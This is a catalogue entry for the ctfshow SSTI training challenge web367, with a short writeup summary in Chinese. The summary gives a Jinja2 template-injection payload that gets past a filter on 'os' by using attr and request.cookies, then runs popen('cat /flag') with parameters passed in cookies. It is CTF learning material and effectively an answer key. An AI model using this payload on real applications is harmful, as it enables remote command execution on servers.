| ID: | 3668 |
|---|---|
| 标题: | web367 |
| 描述: | * 此题为 【从0开始学web】系列第三百六十七题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 ``` 开始过滤 ``` |
| 类型: | WEB入门.SSTI |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/851 |
| 赛事: | SSTI |
| 年度: | None |
| Flag值: | 题目答案文本 |
| writeup: |
https://blog.csdn.net/Yb_140/article/details/124232796 CTFShow平台WEB入门SSTI题目web367的解题过程及答案在网页1中详细描述。当题目过滤了os关键字时,通过attr方法结合request.cookies实现绕过。具体payload为: ?name={{(lipsum attr(request.cookies.a)).get(request.cookies.b).popen(request.cookies.c).read()}} 配合Cookie参数a=__globals__;b=os;c=cat /flag完成命令执行 1。 验证网址为CSDN博客原文,直接展示了解题步骤和payload构造逻辑,内容完整且无跳转。 |